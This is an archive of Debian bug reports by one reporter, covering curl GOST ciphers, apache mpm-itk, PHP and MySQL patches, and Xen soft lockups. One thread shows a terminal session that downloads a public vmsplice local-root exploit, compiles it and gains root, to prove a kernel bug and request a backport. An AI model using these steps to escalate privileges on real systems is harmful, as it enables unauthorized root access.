Bug#805408: curl gost cipher support

2015-11-17 Thread Vitaliy Okulov
Package: curl
Version: 7.38.0-4+deb8u2
Severity: normal

Dear Maintainer,

*** Reporter, please consider answering these questions, where appropriate ***

   * What led up to the situation?
Bug discribed: https://github.com/bagder/curl/issues/447

   * What exactly did you do (or not do) that was effective (or
 ineffective)?
Install Debian 8, curl change /etc/ssl/openssl.cnf to support gost then 
just run: curl -v https://zakupki.gov.ru

   * What was the outcome of this action?
$ curl -v https://zakupki.gov.ru/pgz/services/upload
* Hostname was NOT found in DNS cache
*   Trying 194.105.148.87...
* Connected to zakupki.gov.ru (194.105.148.87) port 443 (#0)
* successfully set certificate verify locations:
*   CAfile: none
  CApath: /etc/ssl/certs
* SSLv3, TLS Unknown, Unknown (22):
* SSLv3, TLS handshake, Client hello (1):
* SSLv2, Unknown (22):
* SSLv3, TLS handshake, Server hello (2):
* SSLv2, Unknown (22):
* SSLv3, TLS handshake, CERT (11):
* SSLv2, Unknown (21):
* SSLv3, TLS alert, Server hello (2):
* error:0609E09C:digital envelope routines:PKEY_SET_TYPE:unsupported algorithm
* Closing connection 0
* SSLv2, Unknown (21):
* SSLv3, TLS alert, Client hello (1):
curl: (35) error:0609E09C:digital envelope routines:PKEY_SET_TYPE:unsupported 
algorithm

   * What outcome did you expect instead?
In curl output:
SSL connection using TLSv1.0 / GOST2001-GOST89-GOST89

*** End of the template - remove these template lines ***


-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages curl depends on:
ii  libc6 2.19-18+deb8u1
ii  libcurl3  7.38.0-4+deb8u2
ii  zlib1g1:1.2.8.dfsg-2+b1

curl recommends no packages.

curl suggests no packages.

-- no debconf information



Bug#797653: apache2-mpm-itk: Cant send emails from PHP script, when install mpm-itk and exim4.

2015-09-01 Thread Vitaliy Okulov
Package: apache2-mpm-itk
Version: 2.4.10-10+deb8u1
Severity: normal

Dear Maintainer,

   * What led up to the situation?
Install apache2-mpm-itk and exim4. Configure apache vhost to some user and 
group.

   * What exactly did you do (or not do) that was effective (or
 ineffective)?
Add vhost, set AssignUserID to this vhost to some new user and group.
Create php script for this vhost with text:

Then just open script from browser.

   * What was the outcome of this action?
bool(False) and error in /var/log/exim4/paniclog:
2015-09-01 13:13:51 unable to set gid=1001 or uid=0 (euid=0): forcing real = 
effective

   * What outcome did you expect instead?
Recieve text in browser - bool(true)

To fix this error i add this settings to apache conf:
LimitUIDRange 0 6000
LimitGIDRange 0 6000

-- System Information:
Debian Release: 8.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages apache2-mpm-itk depends on:
ii  apache2 2.4.10-10+deb8u1
ii  libapache2-mpm-itk  2.4.7-02-1.1

apache2-mpm-itk recommends no packages.

apache2-mpm-itk suggests no packages.

-- no debconf information



Bug#464945: closed by Bastian Blank [EMAIL PROTECTED] (Bug#464945: fixed in linux-2.6 2.6.24-4)

2008-02-11 Thread Vitaliy Okulov
When 2.6.18-6 kernel image will be updated?

2008/2/11, Debian Bug Tracking System [EMAIL PROTECTED]:


 Your message dated
 with message-id [EMAIL PROTECTED]
 and subject line Bug#464945: fixed in linux-2.6 2.6.24-4
 has caused the Debian Bug report #464945,
 regarding linux-image-2.6.18-6-686: Exploit for vmsplice work for
 linux-image-2.18-5-686 (CVE-2008-0009/10)
 to be marked as done.

 This means that you claim that the problem has been dealt with.
 If this is not the case it is now your responsibility to reopen the
 Bug report if necessary, and/or fix the problem forthwith.

 (NB: If you are a system administrator and have no idea what this
 message is talking about, this may indicate a serious mail system
 misconfiguration somewhere. Please contact [EMAIL PROTECTED]
 immediately.)


 --
 464945: http://bugs.debian.org/cgi-bin//464945
 Debian Bug Tracking System
 Contact [EMAIL PROTECTED] with problems


 -- Пересылаемое сообщение --
 From: Bastian Blank [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Date: Mon, 11 Feb 2008 13:02:15 +
 Subject: Bug#464945: fixed in linux-2.6 2.6.24-4
 Source: linux-2.6
 Source-Version: 2.6.24-4

 We believe that the bug you reported is fixed in the latest version of
 linux-2.6, which is due to be installed in the Debian FTP archive:

 linux-2.6_2.6.24-4.diff.gz
   to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.diff.gz
 linux-2.6_2.6.24-4.dsc
   to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.dsc
 linux-doc-2.6.24_2.6.24-4_all.deb
   to pool/main/l/linux-2.6/linux-doc-2.6.24_2.6.24-4_all.deb
 linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
 linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
 linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 headers-2.6.24-1-common_2.6.24-4_powerpc.deb
 linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
 linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
 linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
 linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
 linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
 linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
 linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
 linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-
 image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
 linux-libc-dev_2.6.24-4_powerpc.deb
   to pool/main/l/linux-2.6/linux-libc-dev_2.6.24-4_powerpc.deb
 linux-manual-2.6.24_2.6.24-4_all.deb
   to pool/main/l/linux-2.6/linux-manual-2.6.24_2.6.24-4_all.deb
 linux-patch-debian-2.6.24_2.6.24-4_all.deb
   to pool/main/l/linux-2.6/linux-patch-debian-2.6.24_2.6.24-4_all.deb
 linux-source-2.6.24_2.6.24-4_all.deb
   to pool/main/l/linux-2.6/linux-source-2.6.24_2.6.24-4_all.deb
 linux-support-2.6.24-1_2.6.24-4_all.deb
   to pool/main/l/linux-2.6/linux-support-2.6.24-1_2.6.24-4_all.deb
 linux-tree-2.6.24_2.6.24-4_all.deb
   to pool/main/l/linux-2.6/linux-tree-2.6.24_2.6.24-4_all.deb



 A summary of the changes between this version and the previous one is
 attached.

 Thank you for reporting the bug, which will now be closed.  If you
 have further comments please address them to [EMAIL PROTECTED],
 and the maintainer will reopen the bug report if appropriate.

 Debian distribution maintenance software
 pp.
 Bastian Blank [EMAIL PROTECTED] (supplier of updated linux-2.6 package)

 (This message was generated automatically at their request; if you
 believe that there is a problem with it please contact the archive
 administrators by mailing [EMAIL PROTECTED])


 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Format: 1.7
 Date: Mon, 11 Feb 2008 12:29:23 +0100
 Source: linux-2.6
 Binary: linux-source-2.6.24 linux-doc-2.6.24 linux-manual-2.6.24
 linux-patch-debian-2.6.24 linux-tree-2.6.24 
 linux-support-2.6.24-1linux-libc-dev
 linux-headers-2.6.24-1-all linux-headers-2.6.24-1-all-alpha
 linux-headers-2.6.24-1-common linux-image-2.6.24-1-alpha-generic
 linux-headers-2.6.24-1-alpha-generic linux-image-2.6.24-1-alpha-smp
 linux-headers-2.6.24-1-alpha-smp linux-image-2.6.24-1-alpha-legacy
 linux-headers-2.6.24-1-alpha-legacy linux-headers-2.6.24-1-all-amd64
 linux-image-2.6.24-1-amd64 linux-headers-2.6.24-1-amd64
 linux-headers-2.6.24-1-all-arm 

Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-11 Thread Vitaliy Okulov
Ok, patch work for me.

2008/2/10, Bastian Blank [EMAIL PROTECTED]:

 tags 464945 patch

 On Sun, Feb 10, 2008 at 03:19:20AM +0300, Okulov Vitaliy wrote:
  Just try explot from http://www.milw0rm.com/exploits/5092 at my
  linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
  from 2.6.24.1 kernel (CVE-2008-0009/10).

 Preliminary patch, it includes more checks then the update in 2.6.24.1.

 It at least fixes the exploit.

 Bastian

 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.6 (GNU/Linux)

 iEYEARECAAYFAkeu52EACgkQnw66O/MvCNEfrQCfbFbdVcfe4VblSOxNOLiY9d9F
 GQoAoJCiusdKbBIaZOIUX5YwugsgNRwk
 =VaLS
 -END PGP SIGNATURE-





Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Vitaliy Okulov
Yep, im sure.

Copy of exploit: http://www.securityfocus.com/bid/27704/exploit

[EMAIL PROTECTED]:~/coding/sample$ wget
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--12:25:09--
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
  = `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[=]
6,264 28.84K/s

12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]

[EMAIL PROTECTED]:~/coding/sample$ vi 27704.c
[EMAIL PROTECTED]:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
[EMAIL PROTECTED]:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
[EMAIL PROTECTED]:~/coding/sample$ head -n 20 27704.c
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * -static -Wno-format
 */
#define _GNU_SOURCE
#include stdio.h
[EMAIL PROTECTED]:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl
[EMAIL PROTECTED]:~/coding/sample$ ./root_expl
---
 Linux vmsplice Local Root Exploit
 By qaaz
---
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
[EMAIL PROTECTED]:~/coding/sample# id
uid=0(root) gid=0(root)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
[EMAIL PROTECTED]:~/coding/sample# exit
[EMAIL PROTECTED]:~/coding/sample$

So exploit works.

2008/2/10, Florian Weimer [EMAIL PROTECTED]:

 * Okulov Vitaliy:

  Just try explot from http://www.milw0rm.com/exploits/5092 at my
  linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
  from 2.6.24.1 kernel (CVE-2008-0009/10).

 Milw0rm is down.  Are you sure the exploit is real?  The vulnerable code
 is not present in the 2.6.18 kernel.




Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Vitaliy Okulov
Oh, just reread http://marc.info/?l=linux-kernelm=120262352612128w=2

Thereis no bugfix.

Whait for Jens Axboe to fix this patch.

2008/2/10, Vitaliy Okulov [EMAIL PROTECTED]:

 Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution

 The vendor released version 2.6.24.1 to address these issues. Please see
 the references for more information.

 And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1where 
 i found only 1 bugfix for vmsplice.

 2008/2/10, Florian Weimer [EMAIL PROTECTED]:
 
  * Vitaliy Okulov:
 
   Yep, im sure.
 
  Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
 




Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Vitaliy Okulov
Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution

The vendor released version 2.6.24.1 to address these issues. Please see
the references for more information.

And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1where
i found only 1 bugfix for vmsplice.

2008/2/10, Florian Weimer [EMAIL PROTECTED]:

 * Vitaliy Okulov:

  Yep, im sure.

 Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.



Bug#426353: Re[2]: Bug#426353: mysql-server-5.0: Please add patch for this bug to stable mysql-5.0 server. http://bugs.mysql.com/bug.php?id=27513

2007-05-28 Thread Vitaliy Okulov
Здравствуйте, sean.

Вы писали 28 мая 2007 г., 10:32:03:

 hi vitaliy,

 On Monday 28 May 2007 08:20:18 Okulov Vitaliy wrote:
 Package: mysql-server-5.0
 Version: 5.0.30-3
 Severity: critical
 Justification: breaks unrelated software

 Please add patch for this bug to stable mysql-5.0 server.
 http://bugs.mysql.com/bug.php?id=27513

 yes, someone has shown this one to me and i already have a patch in 
 subversion.  i'll close this bug when we make the security update.


 sean

Ok. Good news.

-- 
С уважением,
 Vitaliy  mailto:[EMAIL PROTECTED]




Bug#407410: same bug again

2007-04-24 Thread Vitaliy Okulov
Здравствуйте, 407410.

Same bug again. I use stable debian 4.0.

From 1 xen domU.
Call Trace:
 IRQ [802a0455] softlockup_tick+0xdb/0xed
 [802686aa] timer_interrupt+0x38d/0x3db
 [80211154] handle_IRQ_event+0x2d/0x60
 [802a0794] __do_IRQ+0xa4/0x105
 [80283f10] _local_bh_enable+0x59/0xb3
 [80266ea6] do_IRQ+0x65/0x73
 [80361694] evtchn_do_upcall+0x86/0xe0
 [8025cede] do_hypervisor_callback+0x1e/0x2c
 EOI [802063aa] hypercall_page+0x3aa/0x1000
 [802063aa] hypercall_page+0x3aa/0x1000
 [80267c26] raw_safe_halt+0x84/0xa8
 [80264ea9] xen_idle+0x38/0x4a
 [80248b9b] cpu_idle+0x97/0xba


From 2 Xen domU.

Call Trace:
 IRQ [802a0455] softlockup_tick+0xdb/0xed
 [802686aa] timer_interrupt+0x38d/0x3db
 [80211154] handle_IRQ_event+0x2d/0x60
 [802a0794] __do_IRQ+0xa4/0x105
 [80283f10] _local_bh_enable+0x59/0xb3
 [80266ea6] do_IRQ+0x65/0x73
 [803616ac] evtchn_do_upcall+0x86/0xe0
 [8025cede] do_hypervisor_callback+0x1e/0x2c
 EOI [802063aa] hypercall_page+0x3aa/0x1000
 [802063aa] hypercall_page+0x3aa/0x1000
 [80267c26] raw_safe_halt+0x84/0xa8
 [80264ea9] xen_idle+0x38/0x4a
 [80248b9b] cpu_idle+0x97/0xba

BUG: soft lockup detected on CPU#1!

Call Trace:
 IRQ [802a0455] softlockup_tick+0xdb/0xed
 [802686aa] timer_interrupt+0x38d/0x3db
 [80211154] handle_IRQ_event+0x2d/0x60
 [802a0794] __do_IRQ+0xa4/0x105
 [80283f10] _local_bh_enable+0x59/0xb3
 [80266ea6] do_IRQ+0x65/0x73
 [803616ac] evtchn_do_upcall+0x86/0xe0
 [8025cede] do_hypervisor_callback+0x1e/0x2c
 EOI [802063aa] hypercall_page+0x3aa/0x1000
 [802063aa] hypercall_page+0x3aa/0x1000
 [80267c26] raw_safe_halt+0x84/0xa8
 [80264ea9] xen_idle+0x38/0x4a
 [80248b9b] cpu_idle+0x97/0xba

 

-- 
С уважением,
 Vitaliy  mailto:[EMAIL PROTECTED]




Bug#418471: [Fwd: [php-maint] patch]

2007-04-11 Thread Vitaliy Okulov
Здравствуйте, sean.

Вы писали 10 апреля 2007 г., 2:03:09:

 Package: php5
 Version: 5.2.0-10
 Severity: important

   Fixed bug #40822 (pdo_mysql does not return rowCount() on select).
   Patch for this bug: http://bugs.php.net/bug.php?id=40822


-- 
С уважением,
 Vitaliy  mailto:[EMAIL PROTECTED]




Bug#418471: linkto CVS patch

2007-04-11 Thread Vitaliy Okulov
Здравствуйте, 418471.

Please add this patch 
http://cvs.php.net/viewvc.cgi/php-src/ext/pdo_mysql/mysql_statement.c?r1=1.48.2.14.2.3r2=1.48.2.14.2.4pathrev=PHP_5_2
to php package.

-- 
С уважением,
 Vitaliy  mailto:[EMAIL PROTECTED]